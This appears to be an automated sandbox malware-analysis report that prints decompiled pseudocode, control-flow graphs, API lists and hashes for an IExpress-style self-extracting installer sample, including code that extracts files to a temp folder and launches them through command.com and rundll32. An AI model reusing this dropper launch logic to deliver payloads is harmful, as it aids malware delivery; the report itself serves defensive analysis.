                                                                                                                                                                                                                                    control_flow_graph 141 191ae8-191b2c call 191680 144 191b3b-191b40 141->144 145 191b2e-191b39 141->145 146 191b46-191b61 call 191a84 144->146 145->146 149 191b9f-191bc2 call 191781 call 19658a 146->149 150 191b63-191b65 146->150 159 191bc7-191bd3 call 1966c8 149->159 151 191b68-191b6d 150->151 151->151 153 191b6f-191b74 151->153 153->149 155 191b76-191b7b 153->155 157 191b7d-191b81 155->157 158 191b83-191b86 155->158 157->158 160 191b8c-191b9d call 191680 157->160 158->149 161 191b88-191b8a 158->161 165 191bd9-191bf1 CompareStringA 159->165 166 191d73-191d7f call 1966c8 159->166 160->159 161->149 161->160 165->166 168 191bf7-191c07 GetFileAttributesA 165->168 174 191df8-191e09 LocalAlloc 166->174 175 191d81-191d99 CompareStringA 166->175 170 191c0d-191c15 168->170 171 191d53-191d5e 168->171 170->171 173 191c1b-191c33 call 191a84 170->173 176 191d64-191d6e call 1944b9 171->176 189 191c50-191c61 LocalAlloc 173->189 190 191c35-191c38 173->190 177 191e0b-191e1b GetFileAttributesA 174->177 178 191dd4-191ddf 174->178 175->174 181 191d9b-191da2 175->181 188 191e94-191ea4 call 196ce0 176->188 182 191e1d-191e1f 177->182 183 191e67-191e73 call 191680 177->183 178->176 186 191da5-191daa 181->186 182->183 187 191e21-191e3e call 191781 182->187 199 191e78-191e84 call 192aac 183->199 186->186 191 191dac-191db4 186->191 187->199 207 191e40-191e43 187->207 189->178 198 191c67-191c72 189->198 195 191c3a 190->195 196 191c40-191c4b call 191a84 190->196 197 191db7-191dbc 191->197 195->196 196->189 197->197 203 191dbe-191dd2 LocalAlloc 197->203 204 191c79-191cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 191c74 198->205 211 191e89-191e92 199->211 203->178 208 191de1-191df3 call 19171e 203->208 209 191cf8-191d07 204->209 210 191cc2-191ccc 204->210 205->204 207->199 214 191e45-191e65 call 1916b3 * 2 207->214 208->211 215 191d09-191d21 GetShortPathNameA 209->215 216 191d23 209->216 212 191cce 210->212 213 191cd3-191cf3 call 191680 * 2 210->213 211->188 212->213 213->211 214->199 220 191d28-191d2b 215->220 216->220 224 191d2d 220->224 225 191d32-191d4e call 19171e 220->225 224->225 225->211
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00191AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x198004; // 0x21bd9a3c
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00191680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00191A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00191781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
					E0019658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00191680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E001966C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E001966C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00191680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00191781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E001916B3( &_v1552, 0x400, " ");
										E001916B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00192AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0019171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00191A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00191A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E001944B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x199120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x191140, _t156, 8,  &_v268) == 0) {
										 *0x199a34 =  *0x199a34 & 0xfffffffb;
										if( *0x199a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0019171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x199a34 =  *0x199a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00191680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00191680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00196CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                    0x00191af3
                                                                                                                                                                                                                                    0x00191afa
                                                                                                                                                                                                                                    0x00191b07
                                                                                                                                                                                                                                    0x00191b09
                                                                                                                                                                                                                                    0x00191b1a
                                                                                                                                                                                                                                    0x00191b20
                                                                                                                                                                                                                                    0x00191b2c
                                                                                                                                                                                                                                    0x00191b3b
                                                                                                                                                                                                                                    0x00191b40
                                                                                                                                                                                                                                    0x00191b2e
                                                                                                                                                                                                                                    0x00191b2e
                                                                                                                                                                                                                                    0x00191b33
                                                                                                                                                                                                                                    0x00191b33
                                                                                                                                                                                                                                    0x00191b46
                                                                                                                                                                                                                                    0x00191b4c
                                                                                                                                                                                                                                    0x00191b52
                                                                                                                                                                                                                                    0x00191b57
                                                                                                                                                                                                                                    0x00191b5d
                                                                                                                                                                                                                                    0x00191b61
                                                                                                                                                                                                                                    0x00191b9f
                                                                                                                                                                                                                                    0x00191b9f
                                                                                                                                                                                                                                    0x00191bb1
                                                                                                                                                                                                                                    0x00191bc2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191b63
                                                                                                                                                                                                                                    0x00191b63
                                                                                                                                                                                                                                    0x00191b65
                                                                                                                                                                                                                                    0x00191b68
                                                                                                                                                                                                                                    0x00191b68
                                                                                                                                                                                                                                    0x00191b6a
                                                                                                                                                                                                                                    0x00191b6b
                                                                                                                                                                                                                                    0x00191b6f
                                                                                                                                                                                                                                    0x00191b74
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191b76
                                                                                                                                                                                                                                    0x00191b7b
                                                                                                                                                                                                                                    0x00191b86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191b8c
                                                                                                                                                                                                                                    0x00191b8c
                                                                                                                                                                                                                                    0x00191b98
                                                                                                                                                                                                                                    0x00191bc7
                                                                                                                                                                                                                                    0x00191bc9
                                                                                                                                                                                                                                    0x00191bcc
                                                                                                                                                                                                                                    0x00191bd3
                                                                                                                                                                                                                                    0x00191d75
                                                                                                                                                                                                                                    0x00191d76
                                                                                                                                                                                                                                    0x00191d78
                                                                                                                                                                                                                                    0x00191d7f
                                                                                                                                                                                                                                    0x00191e05
                                                                                                                                                                                                                                    0x00191e09
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191e12
                                                                                                                                                                                                                                    0x00191e1b
                                                                                                                                                                                                                                    0x00191e73
                                                                                                                                                                                                                                    0x00191e21
                                                                                                                                                                                                                                    0x00191e21
                                                                                                                                                                                                                                    0x00191e28
                                                                                                                                                                                                                                    0x00191e37
                                                                                                                                                                                                                                    0x00191e3e
                                                                                                                                                                                                                                    0x00191e52
                                                                                                                                                                                                                                    0x00191e60
                                                                                                                                                                                                                                    0x00191e60
                                                                                                                                                                                                                                    0x00191e3e
                                                                                                                                                                                                                                    0x00191e79
                                                                                                                                                                                                                                    0x00191e7b
                                                                                                                                                                                                                                    0x00191e84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191d9b
                                                                                                                                                                                                                                    0x00191d9b
                                                                                                                                                                                                                                    0x00191da0
                                                                                                                                                                                                                                    0x00191da2
                                                                                                                                                                                                                                    0x00191da5
                                                                                                                                                                                                                                    0x00191da5
                                                                                                                                                                                                                                    0x00191da7
                                                                                                                                                                                                                                    0x00191da8
                                                                                                                                                                                                                                    0x00191dac
                                                                                                                                                                                                                                    0x00191dae
                                                                                                                                                                                                                                    0x00191db4
                                                                                                                                                                                                                                    0x00191db7
                                                                                                                                                                                                                                    0x00191db7
                                                                                                                                                                                                                                    0x00191db9
                                                                                                                                                                                                                                    0x00191dba
                                                                                                                                                                                                                                    0x00191dbe
                                                                                                                                                                                                                                    0x00191dc3
                                                                                                                                                                                                                                    0x00191dce
                                                                                                                                                                                                                                    0x00191dd2
                                                                                                                                                                                                                                    0x00191deb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191dd2
                                                                                                                                                                                                                                    0x00191bf7
                                                                                                                                                                                                                                    0x00191bfe
                                                                                                                                                                                                                                    0x00191c07
                                                                                                                                                                                                                                    0x00191d55
                                                                                                                                                                                                                                    0x00191d5a
                                                                                                                                                                                                                                    0x00191d5b
                                                                                                                                                                                                                                    0x00191d5d
                                                                                                                                                                                                                                    0x00191d5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191c1b
                                                                                                                                                                                                                                    0x00191c1b
                                                                                                                                                                                                                                    0x00191c20
                                                                                                                                                                                                                                    0x00191c2c
                                                                                                                                                                                                                                    0x00191c33
                                                                                                                                                                                                                                    0x00191c38
                                                                                                                                                                                                                                    0x00191c3a
                                                                                                                                                                                                                                    0x00191c3a
                                                                                                                                                                                                                                    0x00191c40
                                                                                                                                                                                                                                    0x00191c4b
                                                                                                                                                                                                                                    0x00191c4b
                                                                                                                                                                                                                                    0x00191c5d
                                                                                                                                                                                                                                    0x00191c61
                                                                                                                                                                                                                                    0x00191dd4
                                                                                                                                                                                                                                    0x00191dd4
                                                                                                                                                                                                                                    0x00191dd6
                                                                                                                                                                                                                                    0x00191ddb
                                                                                                                                                                                                                                    0x00191ddc
                                                                                                                                                                                                                                    0x00191dde
                                                                                                                                                                                                                                    0x00191d64
                                                                                                                                                                                                                                    0x00191d64
                                                                                                                                                                                                                                    0x00191d67
                                                                                                                                                                                                                                    0x00191d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191c67
                                                                                                                                                                                                                                    0x00191c67
                                                                                                                                                                                                                                    0x00191c6d
                                                                                                                                                                                                                                    0x00191c72
                                                                                                                                                                                                                                    0x00191c74
                                                                                                                                                                                                                                    0x00191c74
                                                                                                                                                                                                                                    0x00191c8e
                                                                                                                                                                                                                                    0x00191c99
                                                                                                                                                                                                                                    0x00191cc0
                                                                                                                                                                                                                                    0x00191cf8
                                                                                                                                                                                                                                    0x00191d07
                                                                                                                                                                                                                                    0x00191d23
                                                                                                                                                                                                                                    0x00191d09
                                                                                                                                                                                                                                    0x00191d14
                                                                                                                                                                                                                                    0x00191d1b
                                                                                                                                                                                                                                    0x00191d1b
                                                                                                                                                                                                                                    0x00191d2b
                                                                                                                                                                                                                                    0x00191d2d
                                                                                                                                                                                                                                    0x00191d2d
                                                                                                                                                                                                                                    0x00191d38
                                                                                                                                                                                                                                    0x00191d39
                                                                                                                                                                                                                                    0x00191d46
                                                                                                                                                                                                                                    0x00191cc2
                                                                                                                                                                                                                                    0x00191cc2
                                                                                                                                                                                                                                    0x00191ccc
                                                                                                                                                                                                                                    0x00191cce
                                                                                                                                                                                                                                    0x00191cce
                                                                                                                                                                                                                                    0x00191cdb
                                                                                                                                                                                                                                    0x00191ce6
                                                                                                                                                                                                                                    0x00191cee
                                                                                                                                                                                                                                    0x00191cee
                                                                                                                                                                                                                                    0x00191e89
                                                                                                                                                                                                                                    0x00191e91
                                                                                                                                                                                                                                    0x00191e92
                                                                                                                                                                                                                                    0x00191e94
                                                                                                                                                                                                                                    0x00191e97
                                                                                                                                                                                                                                    0x00191ea4
                                                                                                                                                                                                                                    0x00191ea4
                                                                                                                                                                                                                                    0x00191c61
                                                                                                                                                                                                                                    0x00191c07
                                                                                                                                                                                                                                    0x00191bd3
                                                                                                                                                                                                                                    0x00191b7b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00191BE7
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00191BFE
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00191C57
                                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00191C88
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00191140,00000000,00000008,?), ref: 00191CB8
                                                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00191D1B
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                    • API String ID: 383838535-3401884814
                                                                                                                                                                                                                                    • Opcode ID: ed41a49e5273b3549aca49d49ea76f479455e54be0da82bcb297fabeceffa8d4
                                                                                                                                                                                                                                    • Instruction ID: 769f1ca09f0ae4e16e83d00de15b3a9b18f91587f748e76838fb952ab74423c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed41a49e5273b3549aca49d49ea76f479455e54be0da82bcb297fabeceffa8d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3A15CB0A0021A7BEF219B24CC45FFA77AAEF55310F1402A5F955A32D1DBB09EC5CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00192F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 406 192f1d-192f3d 407 192f6c-192f73 call 195164 406->407 408 192f3f-192f46 406->408 416 192f79-192f80 call 1955a0 407->416 417 193041 407->417 410 192f48 call 1951e5 408->410 411 192f5f-192f66 call 193a3f 408->411 418 192f4d-192f4f 410->418 411->407 411->417 416->417 424 192f86-192fbe GetSystemDirectoryA call 19658a LoadLibraryA 416->424 420 193043-193053 call 196ce0 417->420 418->417 421 192f55-192f5d 418->421 421->407 421->411 428 192fc0-192fd4 GetProcAddress 424->428 429 192ff7-193004 FreeLibrary 424->429 428->429 432 192fd6-192fee DecryptFileA 428->432 430 193017-193024 SetCurrentDirectoryA 429->430 431 193006-19300c 429->431 434 193054-19305a 430->434 435 193026-19303c call 1944b9 call 196285 430->435 431->430 433 19300e call 19621e 431->433 432->429 441 192ff0-192ff5 432->441 445 193013-193015 433->445 436 19305c call 193b26 434->436 437 193065-19306c 434->437 435->417 447 193061-193063 436->447 443 19307c-193089 437->443 444 19306e-193075 call 19256d 437->444 441->429 449 19308b-193091 443->449 450 1930a1-1930a9 443->450 452 19307a 444->452 445->417 445->430 447->417 447->437 449->450 453 193093 call 193ba2 449->453 455 1930ab-1930ad 450->455 456 1930b4-1930b7 450->456 452->443 460 193098-19309a 453->460 455->456 457 1930af call 194169 455->457 456->420 457->456 460->417 461 19309c 460->461 461->450
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00192F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x198004; // 0x21bd9a3c
				_v8 = _t9 ^ _t46;
				if( *0x198a38 != 0) {
					L5:
					_t11 = E00195164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00196CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E001955A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0019658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x19a288("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x198a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x198a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x198d48 & 0x000000c0;
									if(( *0x198d48 & 0x000000c0) == 0) {
										_t41 =  *0x199a40; // 0x3, executed
										_t26 = E0019256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x198a24; // 0x0
									 *0x199a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x198a38;
										if( *0x198a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00194169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x199a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00193BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x198a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00193B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E001944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x199124 = E00196285();
							goto L16;
						}
						_t59 =  *0x199a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0019621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x198a24;
				if( *0x198a24 != 0) {
					L4:
					_t34 = E00193A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E001951E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x198a38;
				if( *0x198a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                    0x00192f1d
                                                                                                                                                                                                                                    0x00192f28
                                                                                                                                                                                                                                    0x00192f2f
                                                                                                                                                                                                                                    0x00192f3d
                                                                                                                                                                                                                                    0x00192f6c
                                                                                                                                                                                                                                    0x00192f6c
                                                                                                                                                                                                                                    0x00192f71
                                                                                                                                                                                                                                    0x00192f73
                                                                                                                                                                                                                                    0x00193041
                                                                                                                                                                                                                                    0x00193041
                                                                                                                                                                                                                                    0x00193043
                                                                                                                                                                                                                                    0x00193053
                                                                                                                                                                                                                                    0x00193053
                                                                                                                                                                                                                                    0x00192f79
                                                                                                                                                                                                                                    0x00192f80
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192f86
                                                                                                                                                                                                                                    0x00192f86
                                                                                                                                                                                                                                    0x00192f93
                                                                                                                                                                                                                                    0x00192f9e
                                                                                                                                                                                                                                    0x00192fa0
                                                                                                                                                                                                                                    0x00192fa6
                                                                                                                                                                                                                                    0x00192fb8
                                                                                                                                                                                                                                    0x00192fba
                                                                                                                                                                                                                                    0x00192fbe
                                                                                                                                                                                                                                    0x00192fc6
                                                                                                                                                                                                                                    0x00192fcc
                                                                                                                                                                                                                                    0x00192fd4
                                                                                                                                                                                                                                    0x00192fd6
                                                                                                                                                                                                                                    0x00192fd8
                                                                                                                                                                                                                                    0x00192fe0
                                                                                                                                                                                                                                    0x00192fe6
                                                                                                                                                                                                                                    0x00192fee
                                                                                                                                                                                                                                    0x00192ff0
                                                                                                                                                                                                                                    0x00192ff5
                                                                                                                                                                                                                                    0x00192ff5
                                                                                                                                                                                                                                    0x00192fee
                                                                                                                                                                                                                                    0x00192fd4
                                                                                                                                                                                                                                    0x00192ff8
                                                                                                                                                                                                                                    0x00192ffe
                                                                                                                                                                                                                                    0x00193004
                                                                                                                                                                                                                                    0x00193017
                                                                                                                                                                                                                                    0x0019301c
                                                                                                                                                                                                                                    0x00193024
                                                                                                                                                                                                                                    0x00193054
                                                                                                                                                                                                                                    0x0019305a
                                                                                                                                                                                                                                    0x00193065
                                                                                                                                                                                                                                    0x00193065
                                                                                                                                                                                                                                    0x0019306c
                                                                                                                                                                                                                                    0x0019306e
                                                                                                                                                                                                                                    0x00193075
                                                                                                                                                                                                                                    0x0019307a
                                                                                                                                                                                                                                    0x0019307a
                                                                                                                                                                                                                                    0x0019307c
                                                                                                                                                                                                                                    0x00193081
                                                                                                                                                                                                                                    0x00193087
                                                                                                                                                                                                                                    0x00193089
                                                                                                                                                                                                                                    0x001930a1
                                                                                                                                                                                                                                    0x001930a1
                                                                                                                                                                                                                                    0x001930a9
                                                                                                                                                                                                                                    0x001930ab
                                                                                                                                                                                                                                    0x001930ad
                                                                                                                                                                                                                                    0x001930af
                                                                                                                                                                                                                                    0x001930af
                                                                                                                                                                                                                                    0x001930ad
                                                                                                                                                                                                                                    0x001930b6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019308b
                                                                                                                                                                                                                                    0x0019308b
                                                                                                                                                                                                                                    0x00193091
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193093
                                                                                                                                                                                                                                    0x00193098
                                                                                                                                                                                                                                    0x0019309a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019309c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019309c
                                                                                                                                                                                                                                    0x00193089
                                                                                                                                                                                                                                    0x0019305c
                                                                                                                                                                                                                                    0x00193061
                                                                                                                                                                                                                                    0x00193063
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193063
                                                                                                                                                                                                                                    0x0019302b
                                                                                                                                                                                                                                    0x00193032
                                                                                                                                                                                                                                    0x0019303c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019303c
                                                                                                                                                                                                                                    0x00193006
                                                                                                                                                                                                                                    0x0019300c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019300e
                                                                                                                                                                                                                                    0x00193015
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193015
                                                                                                                                                                                                                                    0x00192f80
                                                                                                                                                                                                                                    0x00192f3f
                                                                                                                                                                                                                                    0x00192f46
                                                                                                                                                                                                                                    0x00192f5f
                                                                                                                                                                                                                                    0x00192f5f
                                                                                                                                                                                                                                    0x00192f64
                                                                                                                                                                                                                                    0x00192f66
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192f66
                                                                                                                                                                                                                                    0x00192f4f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192f55
                                                                                                                                                                                                                                    0x00192f5d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00192F93
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00192FB2
